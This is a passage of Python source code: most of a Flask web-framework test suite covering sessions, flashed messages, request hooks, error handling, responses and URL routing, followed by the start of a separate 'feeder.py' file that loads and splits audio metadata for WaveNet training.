return str(flask.session.get('foo', 0))
def run_test(expect_header):
with app.test_client() as c:
assert c.get('/bump').data == b'1'
assert c.get('/bump').data == b'2'
assert c.get('/bump').data == b'3'
rv = c.get('/read')
set_cookie = rv.headers.get('set-cookie')
assert (set_cookie is not None) == expect_header
assert rv.data == b'3'
is_permanent = True
app.config['SESSION_REFRESH_EACH_REQUEST'] = True
run_test(expect_header=True)
is_permanent = True
app.config['SESSION_REFRESH_EACH_REQUEST'] = False
run_test(expect_header=False)
is_permanent = False
app.config['SESSION_REFRESH_EACH_REQUEST'] = True
run_test(expect_header=False)
is_permanent = False
app.config['SESSION_REFRESH_EACH_REQUEST'] = False
run_test(expect_header=False)
def test_session_vary_cookie(app, client):
@app.route('/set')
def set_session():
flask.session['test'] = 'test'
return ''
@app.route('/get')
def get():
return flask.session.get('test')
@app.route('/getitem')
def getitem():
return flask.session['test']
@app.route('/setdefault')
def setdefault():
return flask.session.setdefault('test', 'default')
@app.route('/vary-cookie-header-set')
def vary_cookie_header_set():
response = flask.Response()
response.vary.add('Cookie')
flask.session['test'] = 'test'
return response
@app.route('/vary-header-set')
def vary_header_set():
response = flask.Response()
response.vary.update(('Accept-Encoding', 'Accept-Language'))
flask.session['test'] = 'test'
return response
@app.route('/no-vary-header')
def no_vary_header():
return ''
def expect(path, header_value='Cookie'):
rv = client.get(path)
if header_value:
# The 'Vary' key should exist in the headers only once.
assert len(rv.headers.get_all('Vary')) == 1
assert rv.headers['Vary'] == header_value
else:
assert 'Vary' not in rv.headers
expect('/set')
expect('/get')
expect('/getitem')
expect('/setdefault')
expect('/vary-cookie-header-set')
expect('/vary-header-set', 'Accept-Encoding, Accept-Language, Cookie')
expect('/no-vary-header', None)
def test_flashes(app, req_ctx):
assert not flask.session.modified
flask.flash('Zap')
flask.session.modified = False
flask.flash('Zip')
assert flask.session.modified
assert list(flask.get_flashed_messages()) == ['Zap', 'Zip']
def test_extended_flashing(app):
# Be sure app.testing=True below, else tests can fail silently.
#
# Specifically, if app.testing is not set to True, the AssertionErrors
# in the view functions will cause a 500 response to the test client
# instead of propagating exceptions.
@app.route('/')
def index():
flask.flash(u'Hello World')
flask.flash(u'Hello World', 'error')
flask.flash(flask.Markup(u'<em>Testing</em>'), 'warning')
return ''
@app.route('/test/')
def test():
messages = flask.get_flashed_messages()
assert list(messages) == [
u'Hello World',
u'Hello World',
flask.Markup(u'<em>Testing</em>')
]
return ''
@app.route('/test_with_categories/')
def test_with_categories():
messages = flask.get_flashed_messages(with_categories=True)
assert len(messages) == 3
assert list(messages) == [
('message', u'Hello World'),
('error', u'Hello World'),
('warning', flask.Markup(u'<em>Testing</em>'))
]
return ''
@app.route('/test_filter/')
def test_filter():
messages = flask.get_flashed_messages(
category_filter=['message'], with_categories=True)
assert list(messages) == [('message', u'Hello World')]
return ''
@app.route('/test_filters/')
def test_filters():
messages = flask.get_flashed_messages(
category_filter=['message', 'warning'], with_categories=True)
assert list(messages) == [
('message', u'Hello World'),
('warning', flask.Markup(u'<em>Testing</em>'))
]
return ''
@app.route('/test_filters_without_returning_categories/')
def test_filters2():
messages = flask.get_flashed_messages(
category_filter=['message', 'warning'])
assert len(messages) == 2
assert messages[0] == u'Hello World'
assert messages[1] == flask.Markup(u'<em>Testing</em>')
return ''
# Create new test client on each test to clean flashed messages.
client = app.test_client()
client.get('/')
client.get('/test_with_categories/')
client = app.test_client()
client.get('/')
client.get('/test_filter/')
client = app.test_client()
client.get('/')
client.get('/test_filters/')
client = app.test_client()
client.get('/')
client.get('/test_filters_without_returning_categories/')
def test_request_processing(app, client):
evts = []
@app.before_request
def before_request():
evts.append('before')
@app.after_request
def after_request(response):
response.data += b'|after'
evts.append('after')
return response
@app.route('/')
def index():
assert 'before' in evts
assert 'after' not in evts
return 'request'
assert 'after' not in evts
rv = client.get('/').data
assert 'after' in evts
assert rv == b'request|after'
def test_request_preprocessing_early_return(app, client):
evts = []
@app.before_request
def before_request1():
evts.append(1)
@app.before_request
def before_request2():
evts.append(2)
return "hello"
@app.before_request
def before_request3():
evts.append(3)
return "bye"
@app.route('/')
def index():
evts.append('index')
return "damnit"
rv = client.get('/').data.strip()
assert rv == b'hello'
assert evts == [1, 2]
def test_after_request_processing(app, client):
@app.route('/')
def index():
@flask.after_this_request
def foo(response):
response.headers['X-Foo'] = 'a header'
return response
return 'Test'
resp = client.get('/')
assert resp.status_code == 200
assert resp.headers['X-Foo'] == 'a header'
def test_teardown_request_handler(app, client):
called = []
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route('/')
def root():
return "Response"
rv = client.get('/')
assert rv.status_code == 200
assert b'Response' in rv.data
assert len(called) == 1
def test_teardown_request_handler_debug_mode(app, client):
called = []
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route('/')
def root():
return "Response"
rv = client.get('/')
assert rv.status_code == 200
assert b'Response' in rv.data
assert len(called) == 1
def test_teardown_request_handler_error(app, client):
called = []
app.testing = False
@app.teardown_request
def teardown_request1(exc):
assert type(exc) == ZeroDivisionError
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError()
except:
pass
@app.teardown_request
def teardown_request2(exc):
assert type(exc) == ZeroDivisionError
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError()
except:
pass
@app.route('/')
def fails():
1 // 0
rv = client.get('/')
assert rv.status_code == 500
assert b'Internal Server Error' in rv.data
assert len(called) == 2
def test_before_after_request_order(app, client):
called = []
@app.before_request
def before1():
called.append(1)
@app.before_request
def before2():
called.append(2)
@app.after_request
def after1(response):
called.append(4)
return response
@app.after_request
def after2(response):
called.append(3)
return response
@app.teardown_request
def finish1(exc):
called.append(6)
@app.teardown_request
def finish2(exc):
called.append(5)
@app.route('/')
def index():
return '42'
rv = client.get('/')
assert rv.data == b'42'
assert called == [1, 2, 3, 4, 5, 6]
def test_error_handling(app, client):
app.testing = False
@app.errorhandler(404)
def not_found(e):
return 'not found', 404
@app.errorhandler(500)
def internal_server_error(e):
return 'internal server error', 500
@app.errorhandler(Forbidden)
def forbidden(e):
return 'forbidden', 403
@app.route('/')
def index():
flask.abort(404)
@app.route('/error')
def error():
1 // 0
@app.route('/forbidden')
def error2():
flask.abort(403)
rv = client.get('/')
assert rv.status_code == 404
assert rv.data == b'not found'
rv = client.get('/error')
assert rv.status_code == 500
assert b'internal server error' == rv.data
rv = client.get('/forbidden')
assert rv.status_code == 403
assert b'forbidden' == rv.data
def test_error_handler_unknown_code(app):
with pytest.raises(KeyError) as exc_info:
app.register_error_handler(999, lambda e: ('999', 999))
assert 'Use a subclass' in exc_info.value.args[0]
def test_error_handling_processing(app, client):
app.testing = False
@app.errorhandler(500)
def internal_server_error(e):
return 'internal server error', 500
@app.route('/')
def broken_func():
1 // 0
@app.after_request
def after_request(resp):
resp.mimetype = 'text/x-special'
return resp
resp = client.get('/')
assert resp.mimetype == 'text/x-special'
assert resp.data == b'internal server error'
def test_baseexception_error_handling(app, client):
app.testing = False
@app.route('/')
def broken_func():
raise KeyboardInterrupt()
with pytest.raises(KeyboardInterrupt):
client.get('/')
ctx = flask._request_ctx_stack.top
assert ctx.preserved
assert type(ctx._preserved_exc) is KeyboardInterrupt
def test_before_request_and_routing_errors(app, client):
@app.before_request
def attach_something():
flask.g.something = 'value'
@app.errorhandler(404)
def return_something(error):
return flask.g.something, 404
rv = client.get('/')
assert rv.status_code == 404
assert rv.data == b'value'
def test_user_error_handling(app, client):
class MyException(Exception):
pass
@app.errorhandler(MyException)
def handle_my_exception(e):
assert isinstance(e, MyException)
return '42'
@app.route('/')
def index():
raise MyException()
assert client.get('/').data == b'42'
def test_http_error_subclass_handling(app, client):
class ForbiddenSubclass(Forbidden):
pass
@app.errorhandler(ForbiddenSubclass)
def handle_forbidden_subclass(e):
assert isinstance(e, ForbiddenSubclass)
return 'banana'
@app.errorhandler(403)
def handle_forbidden_subclass(e):
assert not isinstance(e, ForbiddenSubclass)
assert isinstance(e, Forbidden)
return 'apple'
@app.route('/1')
def index1():
raise ForbiddenSubclass()
@app.route('/2')
def index2():
flask.abort(403)
@app.route('/3')
def index3():
raise Forbidden()
assert client.get('/1').data == b'banana'
assert client.get('/2').data == b'apple'
assert client.get('/3').data == b'apple'
def test_errorhandler_precedence(app, client):
class E1(Exception):
pass
class E2(Exception):
pass
class E3(E1, E2):
pass
@app.errorhandler(E2)
def handle_e2(e):
return 'E2'
@app.errorhandler(Exception)
def handle_exception(e):
return 'Exception'
@app.route('/E1')
def raise_e1():
raise E1
@app.route('/E3')
def raise_e3():
raise E3
rv = client.get('/E1')
assert rv.data == b'Exception'
rv = client.get('/E3')
assert rv.data == b'E2'
def test_trapping_of_bad_request_key_errors(app, client):
@app.route('/key')
def fail():
flask.request.form['missing_key']
@app.route('/abort')
def allow_abort():
flask.abort(400)
rv = client.get('/key')
assert rv.status_code == 400
assert b'missing_key' not in rv.data
rv = client.get('/abort')
assert rv.status_code == 400
app.debug = True
with pytest.raises(KeyError) as e:
client.get("/key")
assert e.errisinstance(BadRequest)
assert 'missing_key' in e.value.get_description()
rv = client.get('/abort')
assert rv.status_code == 400
app.debug = False
app.config['TRAP_BAD_REQUEST_ERRORS'] = True
with pytest.raises(KeyError):
client.get('/key')
with pytest.raises(BadRequest):
client.get('/abort')
def test_trapping_of_all_http_exceptions(app, client):
app.config['TRAP_HTTP_EXCEPTIONS'] = True
@app.route('/fail')
def fail():
flask.abort(404)
with pytest.raises(NotFound):
client.get('/fail')
def test_error_handler_after_processor_error(app, client):
app.testing = False
@app.before_request
def before_request():
if trigger == 'before':
1 // 0
@app.after_request
def after_request(response):
if trigger == 'after':
1 // 0
return response
@app.route('/')
def index():
return 'Foo'
@app.errorhandler(500)
def internal_server_error(e):
return 'Hello Server Error', 500
for trigger in 'before', 'after':
rv = client.get('/')
assert rv.status_code == 500
assert rv.data == b'Hello Server Error'
def test_enctype_debug_helper(app, client):
from flask.debughelpers import DebugFilesKeyError
app.debug = True
@app.route('/fail', methods=['POST'])
def index():
return flask.request.files['foo'].filename
# with statement is important because we leave an exception on the
# stack otherwise and we want to ensure that this is not the case
# to not negatively affect other tests.
with client:
with pytest.raises(DebugFilesKeyError) as e:
client.post('/fail', data={'foo': 'index.txt'})
assert 'no file contents were transmitted' in str(e.value)
assert 'This was submitted: "index.txt"' in str(e.value)
def test_response_types(app, client):
@app.route('/text')
def from_text():
return u'Hällo Wörld'
@app.route('/bytes')
def from_bytes():
return u'Hällo Wörld'.encode('utf-8')
@app.route('/full_tuple')
def from_full_tuple():
return 'Meh', 400, {
'X-Foo': 'Testing',
'Content-Type': 'text/plain; charset=utf-8'
}
@app.route('/text_headers')
def from_text_headers():
return 'Hello', {
'X-Foo': 'Test',
'Content-Type': 'text/plain; charset=utf-8'
}
@app.route('/text_status')
def from_text_status():
return 'Hi, status!', 400
@app.route('/response_headers')
def from_response_headers():
return flask.Response('Hello world', 404, {'X-Foo': 'Baz'}), {
"X-Foo": "Bar",
"X-Bar": "Foo"
}
@app.route('/response_status')
def from_response_status():
return app.response_class('Hello world', 400), 500
@app.route('/wsgi')
def from_wsgi():
return NotFound()
assert client.get('/text').data == u'Hällo Wörld'.encode('utf-8')
assert client.get('/bytes').data == u'Hällo Wörld'.encode('utf-8')
rv = client.get('/full_tuple')
assert rv.data == b'Meh'
assert rv.headers['X-Foo'] == 'Testing'
assert rv.status_code == 400
assert rv.mimetype == 'text/plain'
rv = client.get('/text_headers')
assert rv.data == b'Hello'
assert rv.headers['X-Foo'] == 'Test'
assert rv.status_code == 200
assert rv.mimetype == 'text/plain'
rv = client.get('/text_status')
assert rv.data == b'Hi, status!'
assert rv.status_code == 400
assert rv.mimetype == 'text/html'
rv = client.get('/response_headers')
assert rv.data == b'Hello world'
assert rv.headers.getlist('X-Foo') == ['Baz', 'Bar']
assert rv.headers['X-Bar'] == 'Foo'
assert rv.status_code == 404
rv = client.get('/response_status')
assert rv.data == b'Hello world'
assert rv.status_code == 500
rv = client.get('/wsgi')
assert b'Not Found' in rv.data
assert rv.status_code == 404
def test_response_type_errors():
app = flask.Flask(__name__)
app.testing = True
@app.route('/none')
def from_none():
pass
@app.route('/small_tuple')
def from_small_tuple():
return 'Hello',
@app.route('/large_tuple')
def from_large_tuple():
return 'Hello', 234, {'X-Foo': 'Bar'}, '???'
@app.route('/bad_type')
def from_bad_type():
return True
@app.route('/bad_wsgi')
def from_bad_wsgi():
return lambda: None
c = app.test_client()
with pytest.raises(TypeError) as e:
c.get('/none')
assert 'returned None' in str(e.value)
with pytest.raises(TypeError) as e:
c.get('/small_tuple')
assert 'tuple must have the form' in str(e.value)
pytest.raises(TypeError, c.get, '/large_tuple')
with pytest.raises(TypeError) as e:
c.get('/bad_type')
assert 'it was a bool' in str(e.value)
pytest.raises(TypeError, c.get, '/bad_wsgi')
def test_make_response(app, req_ctx):
rv = flask.make_response()
assert rv.status_code == 200
assert rv.data == b''
assert rv.mimetype == 'text/html'
rv = flask.make_response('Awesome')
assert rv.status_code == 200
assert rv.data == b'Awesome'
assert rv.mimetype == 'text/html'
rv = flask.make_response('W00t', 404)
assert rv.status_code == 404
assert rv.data == b'W00t'
assert rv.mimetype == 'text/html'
def test_make_response_with_response_instance(app, req_ctx):
rv = flask.make_response(
flask.jsonify({'msg': 'W00t'}), 400)
assert rv.status_code == 400
assert rv.data == b'{"msg":"W00t"}\n'
assert rv.mimetype == 'application/json'
rv = flask.make_response(
flask.Response(''), 400)
assert rv.status_code == 400
assert rv.data == b''
assert rv.mimetype == 'text/html'
rv = flask.make_response(
flask.Response('', headers={'Content-Type': 'text/html'}),
400, [('X-Foo', 'bar')])
assert rv.status_code == 400
assert rv.headers['Content-Type'] == 'text/html'
assert rv.headers['X-Foo'] == 'bar'
def test_jsonify_no_prettyprint(app, req_ctx):
app.config.update({"JSONIFY_PRETTYPRINT_REGULAR": False})
compressed_msg = b'{"msg":{"submsg":"W00t"},"msg2":"foobar"}\n'
uncompressed_msg = {
"msg": {
"submsg": "W00t"
},
"msg2": "foobar"
}
rv = flask.make_response(
flask.jsonify(uncompressed_msg), 200)
assert rv.data == compressed_msg
def test_jsonify_prettyprint(app, req_ctx):
app.config.update({"JSONIFY_PRETTYPRINT_REGULAR": True})
compressed_msg = {"msg": {"submsg": "W00t"}, "msg2": "foobar"}
pretty_response = \
b'{\n "msg": {\n "submsg": "W00t"\n }, \n "msg2": "foobar"\n}\n'
rv = flask.make_response(
flask.jsonify(compressed_msg), 200)
assert rv.data == pretty_response
def test_jsonify_mimetype(app, req_ctx):
app.config.update({"JSONIFY_MIMETYPE": 'application/vnd.api+json'})
msg = {
"msg": {"submsg": "W00t"},
}
rv = flask.make_response(
flask.jsonify(msg), 200)
assert rv.mimetype == 'application/vnd.api+json'
def test_jsonify_args_and_kwargs_check(app, req_ctx):
with pytest.raises(TypeError) as e:
flask.jsonify('fake args', kwargs='fake')
assert 'behavior undefined' in str(e.value)
def test_url_generation(app, req_ctx):
@app.route('/hello/<name>', methods=['POST'])
def hello():
pass
assert flask.url_for('hello', name='test x') == '/hello/test%20x'
assert flask.url_for('hello', name='test x', _external=True) == \
'http://localhost/hello/test%20x'
def test_build_error_handler(app):
# Test base case, a URL which results in a BuildError.
with app.test_request_context():
pytest.raises(BuildError, flask.url_for, 'spam')
# Verify the error is re-raised if not the current exception.
try:
with app.test_request_context():
flask.url_for('spam')
except BuildError as err:
error = err
try:
raise RuntimeError('Test case where BuildError is not current.')
except RuntimeError:
pytest.raises(
BuildError, app.handle_url_build_error, error, 'spam', {})
# Test a custom handler.
def handler(error, endpoint, values):
# Just a test.
return '/test_handler/'
app.url_build_error_handlers.append(handler)
with app.test_request_context():
assert flask.url_for('spam') == '/test_handler/'
def test_build_error_handler_reraise(app):
# Test a custom handler which reraises the BuildError
def handler_raises_build_error(error, endpoint, values):
raise error
app.url_build_error_handlers.append(handler_raises_build_error)
with app.test_request_context():
pytest.raises(BuildError, flask.url_for, 'not.existing')
def test_url_for_passes_special_values_to_build_error_handler(app):
@app.url_build_error_handlers.append
def handler(error, endpoint, values):
assert values == {
'_external': False,
'_anchor': None,
'_method': None,
'_scheme': None,
}
return 'handled'
with app.test_request_context():
flask.url_for('/')
def test_custom_converters(app, client):
from werkzeug.routing import BaseConverter
class ListConverter(BaseConverter):
def to_python(self, value):
return value.split(',')
def to_url(self, value):
base_to_url = super(ListConverter, self).to_url
return ','.join(base_to_url(x) for x in value)
app.url_map.converters['list'] = ListConverter
@app.route('/<list:args>')
def index(args):
return '|'.join(args)
assert client.get('/1,2,3').data == b'1|2|3'
def test_static_files(app, client):
rv = client.get('/static/index.html')
assert rv.status_code == 200
assert rv.data.strip() == b'<h1>Hello World!</h1>'
with app.test_request_context():
assert flask.url_for('static', filename='index.html') == \
'/static/index.html'
rv.close()
def test_static_url_path():
app = flask.Flask(__name__, static_url_path='/foo')
app.testing = True
rv = app.test_client().get('/foo/index.html')
assert rv.status_code == 200
rv.close()
with app.test_request_context():
assert flask.url_for('static', filename='index.html') == '/foo/index.html'
def test_static_route_with_host_matching():
app = flask.Flask(__name__, host_matching=True, static_host='example.com')
c = app.test_client()
rv = c.get('http://example.com/static/index.html')
assert rv.status_code == 200
rv.close()
with app.test_request_context():
rv = flask.url_for('static', filename='index.html', _external=True)
assert rv == 'http://example.com/static/index.html'
# Providing static_host without host_matching=True should error.
with pytest.raises(Exception):
flask.Flask(__name__, static_host='example.com')
# Providing host_matching=True with static_folder but without static_host should error.
with pytest.raises(Exception):
flask.Flask(__name__, host_matching=True)
# Providing host_matching=True without static_host but with static_folder=None should not error.
flask.Flask(__name__, host_matching=True, static_folder=None)
def test_request_locals():
assert repr(flask.g) == '<LocalProxy unbound>'
assert not flask.g
def test_server_name_subdomain():
app = flask.Flask(__name__, subdomain_matching=True)
client = app.test_client()
@app.route("/")
def index():
return "default"
@app.route("/", subdomain="foo")
def subdomain():
return "subdomain"
app.config["SERVER_NAME"] = "dev.local:5000"
rv = client.get("/")
assert rv.data == b"default"
rv = client.get("/", "http://dev.local:5000")
assert rv.data == b"default"
rv = client.get("/", "https://dev.local:5000")
assert rv.data == b"default"
app.config["SERVER_NAME"] = "dev.local:443"
rv = client.get("/", "https://dev.local")
# Werkzeug 1.0 fixes matching https scheme with 443 port
if rv.status_code != 404:
assert rv.data == b"default"
app.config["SERVER_NAME"] = "dev.local"
rv = client.get("/", "https://dev.local")
assert rv.data == b"default"
# suppress Werkzeug 1.0 warning about name mismatch
with pytest.warns(None):
rv = client.get("/", "http://foo.localhost")
assert rv.status_code == 404
rv = client.get("/", "http://foo.dev.local")
assert rv.data == b"subdomain"
def test_exception_propagation(app, client):
def apprunner(config_key):
@app.route('/')
def index():
1 // 0
if config_key is not None:
app.config[config_key] = True
with pytest.raises(Exception):
client.get('/')
else:
assert client.get('/').status_code == 500
# we have to run this test in an isolated thread because if the
# debug flag is set to true and an exception happens the context is
# not torn down. This causes other tests that run after this fail
# when they expect no exception on the stack.
for config_key in 'TESTING', 'PROPAGATE_EXCEPTIONS', 'DEBUG', None:
t = Thread(target=apprunner, args=(config_key,))
t.start()
t.join()
@pytest.mark.parametrize('debug', [True, False])
@pytest.mark.parametrize('use_debugger', [True, False])
@pytest.mark.parametrize('use_reloader', [True, False])
@pytest.mark.parametrize('propagate_exceptions', [None, True, False])
def test_werkzeug_passthrough_errors(monkeypatch, debug, use_debugger,
use_reloader, propagate_exceptions, app):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(*args, **kwargs):
rv['passthrough_errors'] = kwargs.get('passthrough_errors')
monkeypatch.setattr(werkzeug.serving, 'run_simple', run_simple_mock)
app.config['PROPAGATE_EXCEPTIONS'] = propagate_exceptions
app.run(debug=debug, use_debugger=use_debugger, use_reloader=use_reloader)
def test_max_content_length(app, client):
app.config['MAX_CONTENT_LENGTH'] = 64
@app.before_request
def always_first():
flask.request.form['myfile']
assert False
@app.route('/accept', methods=['POST'])
def accept_file():
flask.request.form['myfile']
assert False
@app.errorhandler(413)
def catcher(error):
return '42'
rv = client.post('/accept', data={'myfile': 'foo' * 100})
assert rv.data == b'42'
def test_url_processors(app, client):
@app.url_defaults
def add_language_code(endpoint, values):
if flask.g.lang_code is not None and \
app.url_map.is_endpoint_expecting(endpoint, 'lang_code'):
values.setdefault('lang_code', flask.g.lang_code)
@app.url_value_preprocessor
def pull_lang_code(endpoint, values):
flask.g.lang_code = values.pop('lang_code', None)
@app.route('/<lang_code>/')
def index():
return flask.url_for('about')
@app.route('/<lang_code>/about')
def about():
return flask.url_for('something_else')
@app.route('/foo')
def something_else():
return flask.url_for('about', lang_code='en')
assert client.get('/de/').data == b'/de/about'
assert client.get('/de/about').data == b'/foo'
assert client.get('/foo').data == b'/en/about'
def test_inject_blueprint_url_defaults(app):
bp = flask.Blueprint('foo.bar.baz', __name__,
template_folder='template')
@bp.url_defaults
def bp_defaults(endpoint, values):
values['page'] = 'login'
@bp.route('/<page>')
def view(page):
pass
app.register_blueprint(bp)
values = dict()
app.inject_url_defaults('foo.bar.baz.view', values)
expected = dict(page='login')
assert values == expected
with app.test_request_context('/somepage'):
url = flask.url_for('foo.bar.baz.view')
expected = '/login'
assert url == expected
def test_nonascii_pathinfo(app, client):
@app.route(u'/киртест')
def index():
return 'Hello World!'
rv = client.get(u'/киртест')
assert rv.data == b'Hello World!'
def test_debug_mode_complains_after_first_request(app, client):
app.debug = True
@app.route('/')
def index():
return 'Awesome'
assert not app.got_first_request
assert client.get('/').data == b'Awesome'
with pytest.raises(AssertionError) as e:
@app.route('/foo')
def broken():
return 'Meh'
assert 'A setup function was called' in str(e.value)
app.debug = False
@app.route('/foo')
def working():
return 'Meh'
assert client.get('/foo').data == b'Meh'
assert app.got_first_request
def test_before_first_request_functions(app, client):
got = []
@app.before_first_request
def foo():
got.append(42)
client.get('/')
assert got == [42]
client.get('/')
assert got == [42]
assert app.got_first_request
def test_before_first_request_functions_concurrent(app, client):
got = []
@app.before_first_request
def foo():
time.sleep(0.2)
got.append(42)
def get_and_assert():
client.get("/")
assert got == [42]
t = Thread(target=get_and_assert)
t.start()
get_and_assert()
t.join()
assert app.got_first_request
def test_routing_redirect_debugging(app, client):
app.debug = True
@app.route('/foo/', methods=['GET', 'POST'])
def foo():
return 'success'
with client:
with pytest.raises(AssertionError) as e:
client.post('/foo', data={})
assert 'http://localhost/foo/' in str(e.value)
assert ('Make sure to directly send '
'your POST-request to this URL') in str(e.value)
rv = client.get('/foo', data={}, follow_redirects=True)
assert rv.data == b'success'
app.debug = False
with client:
rv = client.post('/foo', data={}, follow_redirects=True)
assert rv.data == b'success'
def test_route_decorator_custom_endpoint(app, client):
app.debug = True
@app.route('/foo/')
def foo():
return flask.request.endpoint
@app.route('/bar/', endpoint='bar')
def for_bar():
return flask.request.endpoint
@app.route('/bar/123', endpoint='123')
def for_bar_foo():
return flask.request.endpoint
with app.test_request_context():
assert flask.url_for('foo') == '/foo/'
assert flask.url_for('bar') == '/bar/'
assert flask.url_for('123') == '/bar/123'
assert client.get('/foo/').data == b'foo'
assert client.get('/bar/').data == b'bar'
assert client.get('/bar/123').data == b'123'
def test_preserve_only_once(app, client):
app.debug = True
@app.route('/fail')
def fail_func():
1 // 0
for x in range(3):
with pytest.raises(ZeroDivisionError):
client.get('/fail')
assert flask._request_ctx_stack.top is not None
assert flask._app_ctx_stack.top is not None
# implicit appctx disappears too
flask._request_ctx_stack.top.pop()
assert flask._request_ctx_stack.top is None
assert flask._app_ctx_stack.top is None
def test_preserve_remembers_exception(app, client):
app.debug = True
errors = []
@app.route('/fail')
def fail_func():
1 // 0
@app.route('/success')
def success_func():
return 'Okay'
@app.teardown_request
def teardown_handler(exc):
errors.append(exc)
# After this failure we did not yet call the teardown handler
with pytest.raises(ZeroDivisionError):
client.get('/fail')
assert errors == []
# But this request triggers it, and it's an error
client.get('/success')
assert len(errors) == 2
assert isinstance(errors[0], ZeroDivisionError)
# At this point another request does nothing.
client.get('/success')
assert len(errors) == 3
assert errors[1] is None
def test_get_method_on_g(app_ctx):
assert flask.g.get('x') is None
assert flask.g.get('x', 11) == 11
flask.g.x = 42
assert flask.g.get('x') == 42
assert flask.g.x == 42
def test_g_iteration_protocol(app_ctx):
flask.g.foo = 23
flask.g.bar = 42
assert 'foo' in flask.g
assert 'foos' not in flask.g
assert sorted(flask.g) == ['bar', 'foo']
def test_subdomain_basic_support():
app = flask.Flask(__name__, subdomain_matching=True)
app.config['SERVER_NAME'] = 'localhost.localdomain'
client = app.test_client()
@app.route('/')
def normal_index():
return 'normal index'
@app.route('/', subdomain='test')
def test_index():
return 'test index'
rv = client.get('/', 'http://localhost.localdomain/')
assert rv.data == b'normal index'
rv = client.get('/', 'http://test.localhost.localdomain/')
assert rv.data == b'test index'
def test_subdomain_matching():
app = flask.Flask(__name__, subdomain_matching=True)
client = app.test_client()
app.config['SERVER_NAME'] = 'localhost.localdomain'
@app.route('/', subdomain='<user>')
def index(user):
return 'index for %s' % user
rv = client.get('/', 'http://mitsuhiko.localhost.localdomain/')
assert rv.data == b'index for mitsuhiko'
def test_subdomain_matching_with_ports():
app = flask.Flask(__name__, subdomain_matching=True)
app.config['SERVER_NAME'] = 'localhost.localdomain:3000'
client = app.test_client()
@app.route('/', subdomain='<user>')
def index(user):
return 'index for %s' % user
rv = client.get('/', 'http://mitsuhiko.localhost.localdomain:3000/')
assert rv.data == b'index for mitsuhiko'
@pytest.mark.parametrize('matching', (False, True))
def test_subdomain_matching_other_name(matching):
app = flask.Flask(__name__, subdomain_matching=matching)
app.config['SERVER_NAME'] = 'localhost.localdomain:3000'
client = app.test_client()
@app.route('/')
def index():
return '', 204
# suppress Werkzeug 0.15 warning about name mismatch
with pytest.warns(None):
# ip address can't match name
rv = client.get('/', 'http://127.0.0.1:3000/')
assert rv.status_code == 404 if matching else 204
# allow all subdomains if matching is disabled
rv = client.get('/', 'http://www.localhost.localdomain:3000/')
assert rv.status_code == 404 if matching else 204
def test_multi_route_rules(app, client):
@app.route('/')
@app.route('/<test>/')
def index(test='a'):
return test
rv = client.open('/')
assert rv.data == b'a'
rv = client.open('/b/')
assert rv.data == b'b'
def test_multi_route_class_views(app, client):
class View(object):
def __init__(self, app):
app.add_url_rule('/', 'index', self.index)
app.add_url_rule('/<test>/', 'index', self.index)
def index(self, test='a'):
return test
_ = View(app)
rv = client.open('/')
assert rv.data == b'a'
rv = client.open('/b/')
assert rv.data == b'b'
def test_run_defaults(monkeypatch, app):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(*args, **kwargs):
rv['result'] = 'running...'
monkeypatch.setattr(werkzeug.serving, 'run_simple', run_simple_mock)
app.run()
assert rv['result'] == 'running...'
def test_run_server_port(monkeypatch, app):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(hostname, port, application, *args, **kwargs):
rv['result'] = 'running on %s:%s ...' % (hostname, port)
monkeypatch.setattr(werkzeug.serving, 'run_simple', run_simple_mock)
hostname, port = 'localhost', 8000
app.run(hostname, port, debug=True)
assert rv['result'] == 'running on %s:%s ...' % (hostname, port)
@pytest.mark.parametrize('host,port,expect_host,expect_port', (
(None, None, 'pocoo.org', 8080),
('localhost', None, 'localhost', 8080),
(None, 80, 'pocoo.org', 80),
('localhost', 80, 'localhost', 80),
))
def test_run_from_config(monkeypatch, host, port, expect_host, expect_port, app):
def run_simple_mock(hostname, port, *args, **kwargs):
assert hostname == expect_host
assert port == expect_port
monkeypatch.setattr(werkzeug.serving, 'run_simple', run_simple_mock)
app.config['SERVER_NAME'] = 'pocoo.org:8080'
app.run(host, port)
def test_max_cookie_size(app, client, recwarn):
app.config['MAX_COOKIE_SIZE'] = 100
# outside app context, default to Werkzeug static value,
# which is also the default config
response = flask.Response()
default = flask.Flask.default_config['MAX_COOKIE_SIZE']
assert response.max_cookie_size == default
# inside app context, use app config
with app.app_context():
assert flask.Response().max_cookie_size == 100
@app.route('/')
def index():
r = flask.Response('', status=204)
r.set_cookie('foo', 'bar' * 100)
return r
client.get('/')
assert len(recwarn) == 1
w = recwarn.pop()
assert 'cookie is too large' in str(w.message)
app.config['MAX_COOKIE_SIZE'] = 0
client.get('/')
assert len(recwarn) == 0
|
feeder.py
|
import os
import threading
import time
import numpy as np
import tensorflow as tf
from datasets import audio
from infolog import log
from keras.utils import np_utils
from sklearn.model_selection import train_test_split
from .util import is_mulaw_quantize, is_scalar_input
_batches_per_group = 32
_pad = 0
class Feeder:
"""
Feeds batches of data into queue in a background thread.
"""
def __init__(self, coordinator, metadata_filename, base_dir, hparams):
super(Feeder, self).__init__()
self._coord = coordinator
self._hparams = hparams
self._train_offset = 0
self._test_offset = 0
if hparams.symmetric_mels:
self._spec_pad = -(hparams.max_abs_value + .1)
else:
self._spec_pad = -0.1
#Base directory of the project (to map files from different locations)
self._base_dir = base_dir
#Load metadata
self._data_dir = os.path.dirname(metadata_filename)
with open(metadata_filename, 'r') as f:
self._metadata = [line.strip().split('|') for line in f]
#Train test split
if hparams.wavenet_test_size is None:
assert hparams.wavenet_test_batches is not None
test_size = (hparams.wavenet_test_size if hparams.wavenet_test_size is not None
else hparams.wavenet_test_batches * hparams.wavenet_batch_size)
indices = np.arange(len(self._metadata))
train_indices, test_indices = train_test_split(indices,
test_size=test_size, random_state=hparams.wavenet_data_random_state)
#Make sure test size is a multiple of batch size else round up
len_test_indices = _round_up(len(test_indices), hparams.wavenet_batch_size)
extra_test = test_indices[len_test_indices:]
test_indices = test_indices[:len_test_indices]
train_indices = np.concatenate([train_indices, extra_test])
self._train_meta = list(np.array(self._metadata)[train_indices])
